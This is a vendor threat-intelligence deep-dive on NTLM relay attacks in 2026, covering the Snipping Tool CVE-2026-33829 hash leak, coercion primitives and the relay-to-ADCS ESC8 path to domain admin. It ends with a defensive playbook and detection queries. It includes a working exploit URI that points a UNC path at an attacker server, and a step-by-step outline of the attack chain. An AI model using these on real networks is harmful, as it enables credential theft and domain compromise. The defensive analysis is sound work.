What is Lyrie Research?

Lyrie Research is an autonomous cybersecurity intelligence platform publishing verified threat intelligence including critical CVEs, active exploitation reports, breach analysis, and original research — every article cross-validated by 3+ primary sources.

How does Lyrie.ai protect against rogue AI threats?

Lyrie.ai uses machine-speed autonomous defense to detect and neutralize rogue AI, prompt injection, and AI supply chain attacks. It responds before human analysts can react.

What cybersecurity topics does Lyrie Research cover?

Lyrie Research covers CVE deep dives, CISA KEV actively exploited vulnerabilities, data breach forensics, original cybersecurity research, and AI threat intelligence including agent-based attacks.

How often is Lyrie Research updated?

Lyrie Research is updated continuously by the autonomous Lyrie Sentinel engine, publishing new threat intelligence multiple times daily as new CVEs, exploits, and breaches are confirmed.

Is Lyrie Research free to access?

Yes, all articles on Lyrie Research are freely accessible. For active protection by the same intelligence engine, visit lyrie.ai.

← Deep-Dive

0 sources verified·11 min read

By Lyrie Threat Intelligence·4/25/2026

NTLM Relay in 2026: Microsoft Called Time of Death. Attackers Wrote the Appeal.

Defensive Playbook — April 25, 2026

TL;DR

CVE-2026-33829 (Windows Snipping Tool, CVSS 7.5): PoC dropped this week — a single browser-triggered URI silently coerces SMB authentication and exfiltrates Net-NTLM hashes. Patch: April 14, 2026 Patch Tuesday. Many orgs are still unpatched.
CVE-2025-24054 (NTLM hash disclosure via .library-ms): exploited in-the-wild against government targets in Poland and Romania within 8 days of the patch. CISA KEV listed.
Microsoft's NTLM deprecation Phase 3 (October 2026) blocks NTLMv1 SSO by default. NTLMv2 — the version used in relay attacks — remains permitted indefinitely.
The classic Coercion → NTLM Relay → ADCS ESC8 → Domain Admin chain still works against the majority of enterprise environments running Server 2019/2022.
Detection is achievable but requires specific Event IDs most SOC teams don't monitor.
Bottom line: NTLM relay is not a legacy concern. It is the most consistently successful path from network access to full domain compromise in 2026 red team engagements.

Background: Why a "Deprecated" Protocol Is Still Breaking Enterprises

There is a particular kind of institutional overconfidence that comes from a vendor announcing deprecation. Security teams see "Microsoft to retire NTLM" in their news feed, file it under handled, and move on. The attackers filing it under opportunity are having a much better year.

Microsoft's NTLM deprecation is real and proceeding on schedule. It is also, in its current form, insufficient to protect the enterprise installed base from one of the most productive post-exploitation techniques in the attacker arsenal.

The numbers tell the story: as of early 2026, the majority of enterprise domain controllers run Windows Server 2019 or 2022, not Server 2025. The organizations most dependent on legacy application stacks — the ones that genuinely cannot migrate off NTLM in a quarter — are precisely the organizations with the largest Active Directory environments and the most valuable crown jewels to relay toward.

This week's release of a public proof-of-concept for CVE-2026-33829 (Windows Snipping Tool NTLM hash leak) is a sharp reminder that the coercion problem isn't waiting for Microsoft's deprecation calendar. New NTLM coercion primitives continue to emerge from unexpected attack surfaces — screenshot tools, file pickers, office automation handlers — and each one feeds the same downstream relay chain that has been delivering Domain Admin access for half a decade.

The Deprecation Timeline and Its Structural Gaps

Microsoft's three-phase NTLM deprecation plan:

| Phase | Timeline | What Actually Changes |

|-------|----------|-----------------------|

| Phase 1 | Now (Win 11 24H2 / Server 2025) | Enhanced auditing, NTLMv1 disabled by default in new installs |

| Phase 2 | H2 2026 | IAKerb + Local KDC reduce NTLM fallback in specific scenarios |

| Phase 3 | October 2026 | BlockNTLMv1SSO registry key set to Enforce by default |

The critical detail that gets buried in every breathless "NTLM is dying" headline: Phase 3 enforces the block on NTLMv1 SSO authentication. NTLMv2 — the protocol version used in essentially every modern relay attack — remains permitted. Full NTLM elimination does not have a fixed public enforcement date because the compatibility surface is simply too large: legacy applications, network-attached storage devices with firmware constraints, workgroup systems, and cross-forest authentication scenarios all depend on NTLM in ways that a single registry key cannot resolve.

The Phase 3 announcement will generate another round of "NTLM is dead" coverage. Relay attacks will continue.

Attack Chain Anatomy: Coercion → Relay → ADCS ESC8 → Domain Admin

Understanding why this chain remains so effective requires walking through each link.

Step 1: Coercion — Forcing Authentication

The attacker, starting with only network access and no credentials, needs to coerce a privileged account (typically a computer account with $ suffix) into initiating an NTLM authentication attempt toward an attacker-controlled listener.

CVE-2026-33829: The Snipping Tool Vector (April 2026)

The newly public PoC demonstrates the attack with a single URI:

ms-screensketch:edit?&filePath=\\<attacker-smb-server>\file.png&isTemporary=false&saved=true&source=Toast

When a victim opens this link — through a phishing email, a malicious HTML page with an embedded auto-trigger, or a document with a hyperlink — Windows Snipping Tool launches and silently attempts to load the remote resource over SMB. The ms-screensketch deep link protocol handler accepts a filePath parameter with no input validation, allowing UNC path injection to an attacker-controlled server. Windows NTLM authentication fires transparently in the background. The victim sees only the Snipping Tool opening, which is visually plausible for dozens of social engineering pretexts (HR document review, IT badge crop requests, corporate wallpaper changes).

Disclosed March 23, 2026. Patched April 14, 2026. Public PoC released April 21, 2026. Most enterprise patch cycles run 30–60 days after Patch Tuesday.

CVE-2025-24054: The .library-ms Vector (Still Relevant)

A right-click on a malicious .library-ms file triggers automatic NTLM authentication. Exploited against government institutions within 8 days of patch release. CISA KEV-listed. The same hash-capture outcome.

Other active coercion primitives (no CVE required): PrinterBug / SpoolSample (SMB coercion via Print Spooler), PetitPotam (HTTP coercion via EFS MS-EFSRPC), ShadowCoerce (MS-FSRVP), DFSCoerce (MS-DFSNM). Most of these require no authentication against a default Server 2019/2022 configuration.

Step 2: NTLM Relay — Forwarding the Credential

The attacker runs ntlmrelayx (part of Impacket) configured to relay captured authentication to a target service. The tool intercepts the incoming NTLM negotiation from the coerced system and forwards it in real-time to the target before the session times out.

Key consideration: SMB signing blocks relay over SMB to most domain-joined workstations and servers on modern defaults. The attacker bypasses this by targeting HTTP-based services, where NTLM signing is not enforced. The highest-value target in most environments is waiting in exactly this unprotected state.

Step 3: ADCS ESC8 — Certificate Request as Domain Admin

Active Directory Certificate Services Web Enrollment (certsrv) authenticates via NTLM over HTTP. By default, it requires no signing or channel binding. This is the ESC8 misconfiguration documented by SpecterOps in Certified Pre-Owned (2021) and still present in the vast majority of enterprise ADCS deployments.

The relay looks like this in practice:

1. Attacker captures NTLM authentication from a domain controller computer account (coerced via PetitPotam or any of the above)

2. ntlmrelayx forwards the relay to http://<CA-server>/certsrv/certfnsh.asp

3. The CA server authenticates the relayed credential as the domain controller computer account

4. Attacker requests a certificate with a SAN (Subject Alternative Name) for a Domain Admin account

5. Certificate issued — the ADCS CA signed it because NTLM authentication appeared valid

Total elapsed time in a practiced engagement: 8 minutes.

Step 4: Certificate → Domain Admin

The attacker uses the issued certificate to request a Kerberos TGT for the Domain Admin via PKINIT. No passwords, no hashes, no EDR-triggering pass-the-hash — just a legitimate certificate request to Active Directory.

On Windows Server 2025, this specific path has meaningful new mitigations (certificate binding enforcement). On Server 2019/2022 — the realistic enterprise baseline — it still works.

CVE-2026-33829: Technical Indicators and Patch Status

| Field | Value |

|-------|-------|

| CVE | CVE-2026-33829 |

| CVSS | 7.5 (High) |

| Affected | Windows Snipping Tool (all builds prior to April 14, 2026 Patch Tuesday) |

| Attack Vector | Network / Social Engineering |

| Privileges Required | None |

| User Interaction | Required (one click) |

| Patch Available | Yes — April 14, 2026 Patch Tuesday |

| Public PoC | Yes — Black Arrow Security (GitHub) |

| CISA KEV | Not yet listed as of April 25, 2026 |

Protocol handler: ms-screensketch

Vulnerable parameter: filePath — accepts arbitrary UNC paths without validation

Authentication leak: Net-NTLMv2 hash via automatic SMB connection to attacker-controlled server

IOCs / Indicators

Network (for CVE-2026-33829 exploitation):

Unexpected outbound SMB (port 445) or NetBIOS (port 139) connections from workstation processes, particularly SnippingTool.exe
Outbound connections to external IP addresses on port 445 from workstations (should be blocked at perimeter in most environments; absence of these blocks is itself a finding)
NTLM authentication events with source process SnippingTool.exe in Windows Security event logs

Active Directory (for ESC8 relay):

Event ID 4886: Certificate Services received a certificate request (on CA server) — correlate with domain controller computer accounts requesting user certificates
Event ID 4887: Certificate Services approved a certificate request — flag certificates issued for user accounts where the requesting principal is a computer account ($)
Event ID 4769 (Kerberos Service Ticket): PKINIT-based TGT requests for high-privilege accounts immediately following a 4886/4887 sequence from an unusual source

Process-level (coercion via SnippingTool):

Image: C:\Windows\SystemApps\Microsoft.ScreenSketch_...\SnippingTool.exe
Network connection: destination = <external or unusual internal IP>:445

Lyrie Take

NTLM relay persists because it sits at the intersection of three structural problems that no single vendor fix can resolve simultaneously: legacy protocol dependencies, unsigned HTTP services, and the ergonomics of PKI misuse in AD CS.

What makes this attack class particularly dangerous in 2026 is the coercion surface expansion. The SnippingTool vulnerability is the latest in a long sequence of unexpected protocol handler abuses — each one adding a new social engineering pretext to a fundamentally unchanged downstream relay chain. The attack didn't evolve; only the entry point did.

Microsoft's deprecation roadmap is sincere but insufficient for the 2026 threat timeline. Enterprises on Server 2019/2022 — the clear majority of production deployments — have no automatic protection on the critical NTLM relay-to-ADCS path. The Phase 3 enforcement in October 2026 blocks NTLMv1, not NTLMv2. The window between "PoC released" and "enterprise patched" consistently runs 30–60 days. In that window, with a public PoC, NTLM relay is an open door.

Lyrie's autonomous detection engine monitors for the characteristic NTLM coercion sequences in network telemetry — unexpected SMB authentication from non-server processes, anomalous PKINIT certificate requests, and ESC8-pattern relay against ADCS HTTP endpoints — at machine speed, without waiting for a human analyst to correlate Event IDs across three separate log sources. The 8-minute engagement window that red teams cite as their benchmark is, for Lyrie, less than one detection cycle.

Defender Playbook

Immediate (This Week)

1. Patch CVE-2026-33829 now.

The April 14, 2026 Patch Tuesday update addresses the Snipping Tool vulnerability. With a public PoC available, exploitation risk is elevated. Verify patch deployment via:

Get-HotFix -Id KB5055523  # April 2026 cumulative update — verify KB for your OS version

2. Block outbound SMB at the perimeter.

Outbound connections to external IPs on port 445 should be blocked at the firewall. Many organizations have this rule; many don't. Verify it exists and is enforced. CVE-2026-33829 only works if the coerced SMB connection reaches an attacker server.

3. Audit ADCS Web Enrollment exposure.

Run the following on any system with ADCS installed:

Get-CimInstance -ClassName Win32_Service -Filter "Name='certsvc'"
# Then check: is the Web Enrollment role (certsrv) installed and accessible?
# If you don't have a documented business requirement for it, remove it.

Short-Term (This Month)

4. Enable EPA (Extended Protection for Authentication) on ADCS HTTP endpoints.

This is the direct mitigation for ESC8. It binds NTLM authentication to the TLS channel, preventing relay from a different TLS session. Configure via IIS on the CA server for the certsrv virtual directory.

5. Enable ADCS audit logging.

Without Event IDs 4886 and 4887 collected from CA servers, ESC8 relay is completely invisible in logs. Verify collection:

auditpol /get /subcategory:"Certification Services"
# Should show: Success and Failure

Forward these events to your SIEM. Create an alert: 4887 (certificate approved) where requester is a computer account AND subject SAN != the computer account itself.

6. Enable SMB signing enterprise-wide.

Domain-joined systems have SMB signing negotiated by default; workgroup systems and some network appliances often don't. Audit via:

Get-SmbServerConfiguration | Select RequireSecuritySignature
# Should be True on all servers

7. Block NTLM authentication for sensitive services.

Use Security Policy → Network Security → Restrict NTLM to configure outbound NTLM restrictions for high-value servers. Document exceptions before enforcing.

Medium-Term (This Quarter)

8. Deploy Windows Server 2025 for domain controllers.

Server 2025 ships with certificate binding enforcement (KB5014754) enabled by default, which breaks the ESC8-to-PKINIT chain even if NTLM relay succeeds. This is the single most impactful architectural change available.

9. Enumerate remaining coercion primitives.

Run Coercer (open source) against your internal network from an unauthenticated starting position. It will enumerate which coercion endpoints are active. Every positive result is an open door to the relay chain.

10. Monitor for ms-screensketch protocol handler abuse.

If you run endpoint telemetry (Sysmon, CrowdStrike, Defender for Endpoint), add a detection rule for:

Process: SnippingTool.exe
Event: Network connection initiated
Destination: Any IP that is not an internal storage or content delivery host

Detection Query (Sentinel / KQL)

// ESC8 relay detection: certificate approved for user SAN from computer account
SecurityEvent
| where EventID in (4886, 4887)
| where AccountType == "Computer"
| extend CertSubject = extract("Subject: (.+?)\\n", 1, EventData)
| where CertSubject !contains "$"  // SAN doesn't match the computer account
| project TimeGenerated, Computer, Account, CertSubject, EventID
| order by TimeGenerated desc

// NTLM coercion from unexpected processes
DeviceNetworkEvents
| where InitiatingProcessFileName in~ ("SnippingTool.exe", "explorer.exe", "winword.exe")
| where RemotePort == 445
| where RemoteIPType == "Public"
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteIP, RemotePort

Sources

1. CyberSecurityNews — "PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability" (April 21, 2026): https://cybersecuritynews.com/windows-snipping-tool-ntlm-hash/

2. Hive Security — "NTLM Relay in 2026: Microsoft Declared It Dead. Attackers Didn't Get the Memo." (April 21, 2026): https://hivesecurity.gitlab.io/blog/ntlm-relay-attack-detect-2026/

3. News9Live — "Windows Snipping Tool Flaw Exposed: PoC Exploit Leaks NTLM Hashes Silently" (April 21, 2026): https://www.news9live.com/technology/tech-news/windows-snipping-tool-flaw-exposed-poc-exploit-leaks-ntlm-hashes-silently-2961154

4. ADCS Security — "ESC8: NTLM Relay to ADCS HTTP Endpoints": https://www.adcs-security.com/attacks/esc8

5. SecureW2 — "Active Directory Certificate Services Best Practices for Security Hardening" (April 2026): https://securew2.com/blog/active-directory-certificate-services-ad-cs-explained

6. Diamatix — "Windows Snipping Tool NTLM Hash Leak Vulnerability CVE-2026-33829 Explained" (April 21, 2026): https://diamatix.com/windows-snipping-tool-ntlm-hash-leak-vulnerability/

7. Microsoft MSRC — CVE-2025-24054 Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054

8. Check Point Research — Active exploitation of CVE-2025-24054 in government campaigns (March 2025): https://research.checkpoint.com/2025/ntlm-hash-leaking/

Lyrie.ai Cyber Research Division — Senior Analyst Desk